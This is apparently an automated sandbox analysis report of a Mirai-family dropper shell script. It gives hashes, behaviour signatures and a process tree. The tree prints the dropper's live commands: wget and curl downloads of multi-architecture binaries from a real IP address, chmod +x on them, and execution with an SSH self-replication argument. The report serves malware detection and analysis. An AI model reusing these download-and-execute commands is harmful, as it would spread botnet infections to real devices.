Analysis
-
max time kernel
136s -
max time network
148s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
08/03/2025, 14:44
Static task
static1
Behavioral task
behavioral1
Sample
e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh
-
Size
2KB
-
MD5
6aea9de4b1853e6a5cea8ad020f48398
-
SHA1
20e44372765f05e6899aa9bd7e4d9ff64f59c2f7
-
SHA256
e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f
-
SHA512
4cb78d553f9ae66e591534a047163ba9db0e54261266c700be091b4ddfe773de2e194f3b80916d40830d1d26f6a76912191fd01858922599fa2b88ca0c70d5a2
Malware Config
Extracted
mirai
DEMONS
Extracted
mirai
DEMONS
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 741 chmod 761 chmod 813 chmod 829 chmod 867 chmod 874 chmod 895 chmod 902 chmod 748 chmod 754 chmod 860 chmod 881 chmod 888 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/x 742 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 749 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 755 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 762 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 814 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 830 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 861 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 868 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 875 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 882 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 889 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 896 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh /tmp/x 903 e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh -
Modifies Watchdog functionality 1 TTPs 22 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x -
Enumerates active TCP sockets 1 TTPs 10 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x -
Writes file to system bin folder 11 IoCs
description ioc Process File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x -
Changes its process name 11 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself iXlGiPrIGpG* 755 x Changes the process name, possibly in an attempt to hide itself `}zGlck`ig[ 762 x Changes the process name, possibly in an attempt to hide itself GBm 814 x Changes the process name, possibly in an attempt to hide itself DSyp[zGS]mlm 830 x Changes the process name, possibly in an attempt to hide itself Pf`MG`Diz*gg\G 861 x Changes the process name, possibly in an attempt to hide itself bfcpS*lklbpGcMIS 868 x Changes the process name, possibly in an attempt to hide itself cp\IbDbGlHb*\gP 875 x Changes the process name, possibly in an attempt to hide itself lrkSli`^ 882 x Changes the process name, possibly in an attempt to hide itself pb}\p^PzPPgIy 889 x Changes the process name, possibly in an attempt to hide itself ~KrPD*}H~MGc`f 896 x Changes the process name, possibly in an attempt to hide itself GpPS~PlmIl 903 x -
Reads system network configuration 1 TTPs 10 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 744 wget 746 curl 747 cat -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/uYtea.ppc curl File opened for modification /tmp/uYtea.m68k wget File opened for modification /tmp/uYtea.arc wget File opened for modification /tmp/uYtea.arc curl File opened for modification /tmp/uYtea.x86 wget File opened for modification /tmp/uYtea.mips wget File opened for modification /tmp/uYtea.mpsl curl File opened for modification /tmp/uYtea.arm wget File opened for modification /tmp/uYtea.arm5 wget File opened for modification /tmp/uYtea.arm5 curl File opened for modification /tmp/uYtea.arm7 wget File opened for modification /tmp/uYtea.spc curl File opened for modification /tmp/uYtea.arm curl File opened for modification /tmp/uYtea.arm6 curl File opened for modification /tmp/uYtea.arm7 curl File opened for modification /tmp/uYtea.m68k curl File opened for modification /tmp/uYtea.spc wget File opened for modification /tmp/uYtea.x86_64 curl File opened for modification /tmp/uYtea.x86 curl File opened for modification /tmp/x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh File opened for modification /tmp/uYtea.mips curl File opened for modification /tmp/uYtea.sh4 wget File opened for modification /tmp/uYtea.sh4 curl File opened for modification /tmp/uYtea.x86_64 wget File opened for modification /tmp/uYtea.mpsl wget File opened for modification /tmp/uYtea.arm6 wget File opened for modification /tmp/uYtea.ppc wget
Processes
-
/tmp/e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh/tmp/e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:711 -
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.x862⤵
- Writes file to tmp directory
PID:715
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/catcat uYtea.x862⤵PID:740
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/x./x SSH.Selfrep2⤵PID:742
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/catcat uYtea.mips2⤵
- System Network Configuration Discovery
PID:747
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.mips uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/x./x SSH.Selfrep2⤵PID:749
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.mpsl2⤵
- Writes file to tmp directory
PID:751
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/catcat uYtea.mpsl2⤵PID:753
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:755
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm2⤵
- Writes file to tmp directory
PID:757
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.arm uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:762
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm52⤵
- Writes file to tmp directory
PID:810
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.arm uYtea.arm5 uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:814
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm62⤵
- Writes file to tmp directory
PID:820
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:830
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm72⤵
- Writes file to tmp directory
PID:856
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:861
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.ppc2⤵
- Writes file to tmp directory
PID:863
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:868
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.m68k2⤵
- Writes file to tmp directory
PID:870
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:875
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.sh42⤵
- Writes file to tmp directory
PID:877
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:882
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.spc2⤵
- Writes file to tmp directory
PID:884
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:889
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arc2⤵
- Writes file to tmp directory
PID:891
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:896
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.x86_642⤵
- Writes file to tmp directory
PID:898
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/chmodchmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 uYtea.x86_64 x2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:903
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD5e8ee0839bb7869765d80e4280d585222
SHA1e0aa7ad73b70d2fbd0f8f4ca2d5ca417c6e36538
SHA25634537b3ae42d5d93060f42ccd019a8e976290a01b0380e6688a2dfa1515cd1a6
SHA512a3570f2617a4ed149c1a8a8a396a2d0522c09551ab54ef7c7b882c71b66ac3cd9246e552b6acaceeb2585c337bee9e471af729dee5a08f9a491ab14a6c72f02b
-
Filesize
75KB
MD5e22278172a0f989dcd639152d1f7bdda
SHA15ef82abd4a65994779ed81263e4495aa2a1fc0a0
SHA256c21056260e2db4b9f6dc025dfa6286ef2865b3b4f43a4633a7653499b63f20d3
SHA512686e0967c54a58d086e279d2b3d3aedbc604221b802c2fbf2ec4d55acc681eefcbf1edd236828c257350d5f75694d0dd4a98d35c8e7fa247ebe1dc4bc211e74e
-
Filesize
75KB
MD5d40b08390f13aa89c14e0fedff56e41f
SHA17f5f215fef320e6677f9490dff7732d46f157af9
SHA25610a4c1b8a7106008acb65a31ab3d078f7b056eb30e4397f8b7a09b39855d23ea
SHA512e385eb0f4a06f0264bc5f0b95ffb83673834e3ffb267f947c264f2ccb5017bdee416b6e7c158ed1ef066d14f26eddc7426ab0313fc4de4948fbefb51637be7a6